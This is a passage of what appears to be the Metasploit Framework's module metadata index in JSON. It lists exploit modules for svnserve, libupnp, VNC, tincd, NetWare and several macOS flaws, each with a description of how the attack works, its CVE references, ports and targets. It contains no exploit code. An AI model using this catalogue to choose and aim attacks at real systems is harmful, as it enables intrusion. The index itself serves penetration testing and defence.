"full_name": "exploit/multi/svn/svnserve_date",
"rank": 200,
"disclosure_date": "2004-05-19",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This is an exploit for the Subversion date parsing overflow. This\n exploit is for the svnserve daemon (svn:// protocol) and will not work\n for Subversion over webdav (http[s]://). This exploit should never\n crash the daemon, and should be safe to do multi-hits.\n\n **WARNING** This exploit seems to (not very often, I've only seen\n it during testing) corrupt the subversion database, so be careful!",
"references": [
"CVE-2004-0397",
"OSVDB-6301",
"BID-10386",
"URL-http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html"
],
"platform": "BSD,Linux",
"arch": "x86",
"rport": 3690,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Linux Bruteforce",
"FreeBSD Bruteforce"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/svn/svnserve_date.rb",
"is_install_path": true,
"ref_name": "multi/svn/svnserve_date",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/upnp/libupnp_ssdp_overflow": {
"name": "Portable UPnP SDK unique_service_name() Remote Code Execution",
"full_name": "exploit/multi/upnp/libupnp_ssdp_overflow",
"rank": 300,
"disclosure_date": "2013-01-29",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Alex Eubanks <endeavor@rainbowsandpwnies.com>",
"Richard Harman <richard@richardharman.com>",
"Frederic Basse <contact@fredericb.info>"
],
"description": "This module exploits a buffer overflow in the unique_service_name()\n function of libupnp's SSDP processor. The libupnp library is used across\n thousands of devices and is referred to as the Intel SDK for UPnP\n Devices or the Portable SDK for UPnP Devices.\n\n Due to size limitations on many devices, this exploit uses a separate TCP\n listener to stage the real payload.",
"references": [
"CVE-2012-5958",
"OSVDB-89611",
"US-CERT-VU-922681",
"URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
],
"platform": "Unix",
"arch": "cmd",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1",
"Axis Camera M1011 5.20.1 UPnP/1.4.1",
"Debug Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb",
"is_install_path": true,
"ref_name": "multi/upnp/libupnp_ssdp_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/vnc/vnc_keyboard_exec": {
"name": "VNC Keyboard Remote Code Execution",
"full_name": "exploit/multi/vnc/vnc_keyboard_exec",
"rank": 500,
"disclosure_date": "2015-07-10",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits VNC servers by sending virtual keyboard keys and executing\n a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager\n payload is typed and executed. On Unix/Linux systems an xterm terminal is opened\n and a payload is typed and executed.",
"references": [
"URL-http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/"
],
"platform": "Unix,Windows",
"arch": "",
"rport": 5900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"VNC Windows / Powershell",
"VNC Windows / VBScript CMDStager",
"VNC Linux / Unix"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/vnc/vnc_keyboard_exec.rb",
"is_install_path": true,
"ref_name": "multi/vnc/vnc_keyboard_exec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/vpn/tincd_bof": {
"name": "Tincd Post-Authentication Remote TCP Stack Buffer Overflow",
"full_name": "exploit/multi/vpn/tincd_bof",
"rank": 200,
"disclosure_date": "2013-04-22",
"type": "exploit",
"author": [
"Tobias Ospelt <tobias@modzero.ch>",
"Martin Schobert <schobert@modzero.ch>"
],
"description": "This module exploits a stack buffer overflow in Tinc's tincd\n service. After authentication, a specially crafted tcp packet (default port 655)\n leads to a buffer overflow and allows arbitrary code execution. This module has\n been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7\n (windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of\n FreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works\n for all versions <= 1.1pre6.\n A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to\n be a non-exploitable crash due to calls to __memcpy_chk depending on how tincd\n was compiled. The bug was fixed in version 1.0.21/1.1pre7. While writing this module\n it was recommended to the maintainer to start using DEP/ASLR and other protection\n mechanisms.",
"references": [
"CVE-2013-1428",
"OSVDB-92653",
"BID-59369",
"URL-http://www.floyd.ch/?p=741",
"URL-http://sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/"
],
"platform": "",
"arch": "",
"rport": 655,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP x86, tinc 1.1.pre6 (exe installer)",
"Windows 7 x86, tinc 1.1.pre6 (exe installer)",
"FreeBSD 9.1-RELEASE # 0 x86, tinc 1.0.19 (ports)",
"Fedora 19 x86 ROP (NX), write binary to disk payloads, tinc 1.0.20 (manual compile)",
"Fedora 19 x86 ROP (NX), CMD exec payload, tinc 1.0.20 (manual compile)",
"Archlinux 2013.04.01 x86, tinc 1.0.20 (manual compile)",
"OpenSuse 11.2 x86, tinc 1.0.20 (manual compile)",
"Pidora 18 ARM ROP(NX)/ASLR brute force, write binary to disk payloads, tinc 1.0.20 (manual compile with restarting daemon)",
"Pidora 18 ARM ROP(NX)/ASLR brute force, CMD exec payload, tinc 1.0.20 (manual compile with restarting daemon)",
"Crash only: Ubuntu 12.10 x86, tinc 1.1.pre6 (apt-get or manual compile)",
"Crash only: Fedora 16 x86, tinc 1.0.19 (yum)",
"Crash only: OpenSuse 11.2 x86, tinc 1.0.16 (rpm package)",
"Crash only: Debian 7.3 ARM, tinc 1.0.19 (apt-get)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/vpn/tincd_bof.rb",
"is_install_path": true,
"ref_name": "multi/vpn/tincd_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/wyse/hagent_untrusted_hsdata": {
"name": "Wyse Rapport Hagent Fake Hserver Command Execution",
"full_name": "exploit/multi/wyse/hagent_untrusted_hsdata",
"rank": 600,
"disclosure_date": "2009-07-10",
"type": "exploit",
"author": [
"kf <kf_list@digitalmunition.com>"
],
"description": "This module exploits the Wyse Rapport Hagent service by pretending to\n be a legitimate server. This process involves starting both HTTP and\n FTP services on the attacker side, then contacting the Hagent service of\n the target and indicating that an update is available. The target will\n then download the payload wrapped in an executable from the FTP service.",
"references": [
"CVE-2009-0695",
"OSVDB-55839",
"US-CERT-VU-654545",
"URL-http://snosoft.blogspot.com/",
"URL-http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XPe x86",
"Wyse Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb",
"is_install_path": true,
"ref_name": "multi/wyse/hagent_untrusted_hsdata",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_netware/smb/lsass_cifs": {
"name": "Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow",
"full_name": "exploit/netware/smb/lsass_cifs",
"rank": 200,
"disclosure_date": "2007-01-21",
"type": "exploit",
"author": [
"toto"
],
"description": "This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.\n Since the driver runs in the kernel space, a failed exploit attempt can\n cause the OS to reboot.",
"references": [
"CVE-2005-2852",
"OSVDB-12790"
],
"platform": "Netware",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"VMware",
"NetWare 6.5 SP2",
"NetWare 6.5 SP3",
"NetWare 6.5 SP4",
"NetWare 6.5 SP5",
"NetWare 6.5 SP6",
"NetWare 6.5 SP7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/netware/smb/lsass_cifs.rb",
"is_install_path": true,
"ref_name": "netware/smb/lsass_cifs",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_netware/sunrpc/pkernel_callit": {
"name": "NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow",
"full_name": "exploit/netware/sunrpc/pkernel_callit",
"rank": 400,
"disclosure_date": "2009-09-30",
"type": "exploit",
"author": [
"pahtzo"
],
"description": "This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.\n PKERNEL.NLM is installed by default on all NetWare servers to support NFS.\n The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can\n cause the operating system to reboot.",
"references": [
"BID-36564",
"OSVDB-58447",
"ZDI-09-067"
],
"platform": "Netware",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"NetWare 6.5 SP2",
"NetWare 6.5 SP3",
"NetWare 6.5 SP4",
"NetWare 6.5 SP5",
"NetWare 6.5 SP6",
"NetWare 6.5 SP7",
"NetWare 6.5 SP8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/netware/sunrpc/pkernel_callit.rb",
"is_install_path": true,
"ref_name": "netware/sunrpc/pkernel_callit",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/afp/loginext": {
"name": "AppleFileServer LoginExt PathName Overflow",
"full_name": "exploit/osx/afp/loginext",
"rank": 200,
"disclosure_date": "2004-05-03",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the AppleFileServer service\n on MacOS X. This vulnerability was originally reported by Atstake and\n was actually one of the few useful advisories ever published by that\n company. You only have one chance to exploit this bug.\n This particular exploit uses a stack-based return address that will\n only work under optimal conditions.",
"references": [
"CVE-2004-0430",
"OSVDB-5762",
"BID-10271"
],
"platform": "OSX",
"arch": "",
"rport": 548,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.3.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/afp/loginext.rb",
"is_install_path": true,
"ref_name": "osx/afp/loginext",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/arkeia/type77": {
"name": "Arkeia Backup Client Type 77 Overflow (Mac OS X)",
"full_name": "exploit/osx/arkeia/type77",
"rank": 200,
"disclosure_date": "2005-02-18",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the Arkeia backup\n client for the Mac OS X platform. This vulnerability affects\n all versions up to and including 5.3.3 and has been tested\n with Arkeia 5.3.1 on Mac OS X 10.3.5.",
"references": [
"CVE-2005-0491",
"OSVDB-14011",
"BID-12594"
],
"platform": "OSX",
"arch": "",
"rport": 617,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Arkeia 5.3.1 Stack Return (boot)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/arkeia/type77.rb",
"is_install_path": true,
"ref_name": "osx/arkeia/type77",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/adobe_flash_delete_range_tl_op": {
"name": "Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion",
"full_name": "exploit/osx/browser/adobe_flash_delete_range_tl_op",
"rank": 500,
"disclosure_date": "2016-04-27",
"type": "exploit",
"author": [
"Genwei Jiang",
"bcook-r7"
],
"description": "This module exploits a type confusion on Adobe Flash Player, which was\n originally found being successfully exploited in the wild. This module\n has been tested successfully on:\n macOS Sierra 10.12.3,\n Safari and Adobe Flash Player 21.0.0.182,\n Firefox and Adobe Flash Player 21.0.0.182.",
"references": [
"CVE-2016-4117",
"BID-90505",
"URL-https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html",
"URL-http://www.securitytracker.com/id/1035826",
"URL-https://helpx.adobe.com/security/products/flash-player/apsa16-02.html",
"URL-https://helpx.adobe.com/security/products/flash-player/apsb16-15.html"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X"
],
"mod_time": "2019-02-09 18:46:35 +0000",
"path": "/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb",
"is_install_path": true,
"ref_name": "osx/browser/adobe_flash_delete_range_tl_op",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/mozilla_mchannel": {
"name": "Mozilla Firefox 3.6.16 mChannel Use-After-Free",
"full_name": "exploit/osx/browser/mozilla_mchannel",
"rank": 300,
"disclosure_date": "2011-05-10",
"type": "exploit",
"author": [
"regenrecht",
"Rh0",
"argp <argp@census-labs.com>"
],
"description": "This module exploits a use-after-free vulnerability in Mozilla\n Firefox 3.6.16. An OBJECT element, mChannel, can be freed via the\n OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel\n becomes a dangling pointer and can be reused when setting the OBJECT's\n data attribute. This module has been tested on Mac OS X 10.6.6, 10.6.7,\n 10.6.8, 10.7.2 and 10.7.3.",
"references": [
"CVE-2011-0065",
"OSVDB-72085",
"URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986",
"URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Firefox 3.6.16 on Mac OS X (10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/browser/mozilla_mchannel.rb",
"is_install_path": true,
"ref_name": "osx/browser/mozilla_mchannel",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/safari_file_policy": {
"name": "Apple Safari file:// Arbitrary Code Execution",
"full_name": "exploit/osx/browser/safari_file_policy",
"rank": 300,
"disclosure_date": "2011-10-12",
"type": "exploit",
"author": [
"Aaron Sigel",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Apple Safari on OS X platform.\n A policy issue in the handling of file:// URLs may allow arbitrary remote code\n execution under the context of the user.\n\n In order to trigger arbitrary remote code execution, the best way seems to\n be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or\n a file format that OS X might automount), and then execute it in /Volumes/[share].\n If there's some kind of bug that leaks the victim machine's current username,\n then it's also possible to execute the payload in /Users/[username]/Downloads/,\n or else bruteforce your way to getting that information.\n\n Please note that non-java payloads (*.sh extension) might get launched by\n Xcode instead of executing it, in that case please try the Java ones instead.",
"references": [
"CVE-2011-3230",
"OSVDB-76389",
"URL-http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments",
"URL-http://support.apple.com/kb/HT5000"
],
"platform": "Java,OSX,Unix",
"arch": "cmd, java",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Safari 5.1 on OS X",
"Safari 5.1 on OS X with Java"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/osx/browser/safari_file_policy.rb",
"is_install_path": true,
"ref_name": "osx/browser/safari_file_policy",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/safari_metadata_archive": {
"name": "Safari Archive Metadata Command Execution",
"full_name": "exploit/osx/browser/safari_metadata_archive",
"rank": 600,
"disclosure_date": "2006-02-21",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a vulnerability in Safari's \"Safe file\" feature, which will\n automatically open any file with one of the allowed extensions. This can be abused\n by supplying a zip file, containing a shell script, with a metafile indicating\n that the file should be opened by Terminal.app. This module depends on\n the 'zip' command-line utility.",
"references": [
"CVE-2006-0848",
"OSVDB-23510",
"BID-16736"
],
"platform": "Unix",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/browser/safari_metadata_archive.rb",
"is_install_path": true,
"ref_name": "osx/browser/safari_metadata_archive",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/safari_proxy_object_type_confusion": {
"name": "Safari Proxy Object Type Confusion",
"full_name": "exploit/osx/browser/safari_proxy_object_type_confusion",
"rank": 0,
"disclosure_date": "2018-03-15",
"type": "exploit",
"author": [
"saelo"
],
"description": "This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The JIT region is then replaced with shellcode which loads the second stage.\n The second stage exploits a logic error in libxpc, which uses command execution\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).",
"references": [
"CVE-2018-4233",
"CVE-2018-4404",
"URL-https://github.com/saelo/cve-2018-4233",
"URL-https://github.com/saelo/pwn2own2018",
"URL-https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf"
],
"platform": "OSX",
"arch": "python, cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Python payload",
"Command payload"
],
"mod_time": "2019-01-22 15:39:59 +0000",
"path": "/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb",
"is_install_path": true,
"ref_name": "osx/browser/safari_proxy_object_type_confusion",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/safari_user_assisted_applescript_exec": {
"name": "Safari User-Assisted Applescript Exec Attack",
"full_name": "exploit/osx/browser/safari_user_assisted_applescript_exec",
"rank": 0,
"disclosure_date": "2015-10-16",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "In versions of Mac OS X before 10.11.1, the applescript:// URL\n scheme is provided, which opens the provided script in the Applescript\n Editor. Pressing cmd-R in the Editor executes the code without any\n additional confirmation from the user. By getting the user to press\n cmd-R in Safari, and by hooking the cmd-key keypress event, a user\n can be tricked into running arbitrary Applescript code.\n\n Gatekeeper should be disabled from Security & Privacy in order to\n avoid the unidentified Developer prompt.",
"references": [
"CVE-2015-7007",
"URL-https://support.apple.com/en-us/HT205375"
],
"platform": "OSX,Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb",
"is_install_path": true,
"ref_name": "osx/browser/safari_user_assisted_applescript_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/safari_user_assisted_download_launch": {
"name": "Safari User-Assisted Download and Run Attack",
"full_name": "exploit/osx/browser/safari_user_assisted_download_launch",
"rank": 0,
"disclosure_date": "2014-03-10",
"type": "exploit",
"author": [
"joev <joev@metasploit.com>"
],
"description": "This module abuses some Safari functionality to force the download of a\n zipped .app OSX application containing our payload. The app is then\n invoked using a custom URL scheme. At this point, the user is presented\n with Gatekeeper's prompt:\n\n \"APP_NAME\" is an application downloaded from the internet. Are you sure you\n want to open it?\n\n If the user clicks \"Open\", the app and its payload are executed.\n\n If the user has the \"Only allow applications downloaded from Mac App Store\n and identified developers\" setting enabled (on by default on OS 10.8+), the user will see\n an error dialog containing \"can't be opened because it is from an unidentified\n developer.\" To work around this issue, you will need to manually build and sign\n an OSX app containing your payload with a custom URL handler called \"openurl\".\n\n You can put newlines and unicode in your APP_NAME, although you must be careful not\n to create a prompt that is too tall, or the user will not be able to click\n the buttons, and will have to either logout or kill the CoreServicesUIAgent\n process.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X x86 (Native Payload)",
"Mac OS X x64 (Native Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb",
"is_install_path": true,
"ref_name": "osx/browser/safari_user_assisted_download_launch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/browser/software_update": {
"name": "Apple OS X Software Update Command Execution",
"full_name": "exploit/osx/browser/software_update",
"rank": 600,
"disclosure_date": "2007-12-17",
"type": "exploit",
"author": [
"Moritz Jodeit <moritz@jodeit.org>"
],
"description": "This module exploits a feature in the Distribution Packages,\n which are used in the Apple Software Update mechanism. This feature\n allows for arbitrary command execution through JavaScript. This exploit\n provides the malicious update server. Requests must be redirected to\n this server by other means for this exploit to work.",
"references": [
"CVE-2007-5863",
"OSVDB-40722"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/browser/software_update.rb",
"is_install_path": true,
"ref_name": "osx/browser/software_update",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/email/mailapp_image_exec": {
"name": "Mail.app Image Attachment Command Execution",
"full_name": "exploit/osx/email/mailapp_image_exec",
"rank": 0,
"disclosure_date": "2006-03-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"kf <kf_list@digitalmunition.com>"
],
"description": "This module exploits a command execution vulnerability in the\n Mail.app application shipped with Mac OS X 10.5.0. This flaw was\n patched in 10.4 in March of 2006 (CVE-2006-0395), but reintroduced into the final\n release of 10.5 (CVE-2007-6165).",
"references": [
"CVE-2006-0395",
"CVE-2007-6165",
"OSVDB-40875",
"BID-26510",
"BID-16907"
],
"platform": "OSX,Unix",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic",
"Mail.app - Command Payloads",
"Mail.app - Binary Payloads (x86)",
"Mail.app - Binary Payloads (ppc)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/email/mailapp_image_exec.rb",
"is_install_path": true,
"ref_name": "osx/email/mailapp_image_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/ftp/webstar_ftp_user": {
"name": "WebSTAR FTP Server USER Overflow",
"full_name": "exploit/osx/ftp/webstar_ftp_user",
"rank": 200,
"disclosure_date": "2004-07-13",
"type": "exploit",
"author": [
"ddz <ddz@theta44.org>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the logging routine\n of the WebSTAR FTP server. Reliable code execution is\n obtained by a series of hops through the System library.",
"references": [
"CVE-2004-0695",
"OSVDB-7794",
"BID-10720"
],
"platform": "OSX",
"arch": "",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Mac OS X 10.3.4-10.3.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/osx/ftp/webstar_ftp_user.rb",
"is_install_path": true,
"ref_name": "osx/ftp/webstar_ftp_user",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/http/evocam_webserver": {
"name": "MacOS X EvoCam HTTP GET Buffer Overflow",
"full_name": "exploit/osx/http/evocam_webserver",
"rank": 200,
"disclosure_date": "2010-06-01",
"type": "exploit",
"author": [
"Paul Harrington",
"dookie"
],
"description": "This module exploits a stack buffer overflow in the web server provided with the EvoCam\n program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload\n from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,\n 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.",
"references": [
"CVE-2010-2309",
"OSVDB-65043",
"EDB-12835"
],
"platform": "OSX",
"arch": "",
"rport": 8080,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.5.8 x86, EvoCam 3.6.6",
"Mac OS X 10.5.8 x86, EvoCam 3.6.7"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/osx/http/evocam_webserver.rb",
"is_install_path": true,
"ref_name": "osx/http/evocam_webserver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/dyld_print_to_file_root": {
"name": "Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation",
"full_name": "exploit/osx/local/dyld_print_to_file_root",
"rank": 500,
"disclosure_date": "2015-07-21",
"type": "exploit",
"author": [
"Stefan Esser",
"joev <joev@metasploit.com>"
],
"description": "In Apple OS X 10.10.4 and prior, the DYLD_PRINT_TO_FILE environment\n variable is used for redirecting logging data to a file instead of\n stderr. Due to a design error, this feature can be abused by a local\n attacker to write arbitrary files as root via restricted, SUID-root\n binaries.",
"references": [
"CVE-2015-3760",
"URL-https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html",
"URL-https://www.reddit.com/r/netsec/comments/3e34i2/os_x_1010_dyld_print_to_file_local_privilege/"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.10-10.10.4"
],
"mod_time": "2018-11-04 05:28:32 +0000",
"path": "/modules/exploits/osx/local/dyld_print_to_file_root.rb",
"is_install_path": true,
"ref_name": "osx/local/dyld_print_to_file_root",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/iokit_keyboard_root": {
"name": "Mac OS X IOKit Keyboard Driver Root Privilege Escalation",
"full_name": "exploit/osx/local/iokit_keyboard_root",
"rank": 0,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Ian Beer",
"joev <joev@metasploit.com>"
],
"description": "A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory\n corruption in Mac OS X before 10.10. By abusing a bug in the IORegistry, kernel\n pointers can also be leaked, allowing a full kASLR bypass.\n\n Tested on Mavericks 10.9.5, and should work on previous versions.\n\n The issue was patched silently in Yosemite.",
"references": [
"CVE-2014-4404",
"URL-http://googleprojectzero.blogspot.com/2014/11/pwn4fun-spring-2014-safari-part-ii.html",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=40",
"URL-https://code.google.com/p/google-security-research/issues/detail?id=126"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.9.5 Mavericks x64 (Native Payload)"
],
"mod_time": "2018-05-31 12:26:33 +0000",
"path": "/modules/exploits/osx/local/iokit_keyboard_root.rb",
"is_install_path": true,
"ref_name": "osx/local/iokit_keyboard_root",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/libxpc_mitm_ssudo": {
"name": "Mac OS X libxpc MITM Privilege Escalation",
"full_name": "exploit/osx/local/libxpc_mitm_ssudo",
"rank": 600,
"disclosure_date": "2018-03-15",
"type": "exploit",
"author": [
"saelo"
],
"description": "This module exploits a vulnerability in libxpc on macOS <= 10.13.3.\n The task_set_special_port API allows callers to overwrite their bootstrap port,\n which is used to communicate with launchd. This port is inherited across forks:\n child processes will use the same bootstrap port as the parent.\n By overwriting the bootstrap port and forking a child process, we can gain\n a MitM position between our child and launchd.\n\n To gain root we target the sudo binary and intercept its communication with\n opendirectoryd, which is used by sudo to verify credentials. We modify the\n replies from opendirectoryd to make it look like our password was valid.",
"references": [
"CVE-2018-4237",
"URL-https://github.com/saelo/pwn2own2018"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X x64 (Native Payload)"
],
"mod_time": "2018-11-20 15:58:55 +0000",
"path": "/modules/exploits/osx/local/libxpc_mitm_ssudo.rb",
"is_install_path": true,
"ref_name": "osx/local/libxpc_mitm_ssudo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/nfs_mount_root": {
"name": "Mac OS X NFS Mount Privilege Escalation Exploit",
"full_name": "exploit/osx/local/nfs_mount_root",
"rank": 300,
"disclosure_date": "2014-04-11",
"type": "exploit",
"author": [
"Kenzley Alphonse",
"joev <joev@metasploit.com>"
],
"description": "This exploit leverages a stack overflow vulnerability to escalate privileges.\n The vulnerable function nfs_convert_old_nfs_args does not verify the size\n of a user-provided argument before copying it to the stack. As a result, by\n passing a large size as an argument, a local user can overwrite the stack with arbitrary\n content.\n\n Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.",
"references": [
"EDB-32813"
],
"platform": "OSX",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mac OS X 10.7 Lion x64 (Native Payload)"
],
"mod_time": "2018-05-31 12:26:33 +0000",
"path": "/modules/exploits/osx/local/nfs_mount_root.rb",
"is_install_path": true,
"ref_name": "osx/local/nfs_mount_root",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_osx/local/persistence": {
"name": "Mac OS X Persistent Payload Installer",
"full_name": "exploit/osx/local/persistence",
"rank": 600,
"disclosure_date": "2012-04-01",
"type": "exploit",
"author": [
"Marcin 'Icewall' Noga <marcin@icewall.pl>",
"joev <joev@metasploit.com>"
],
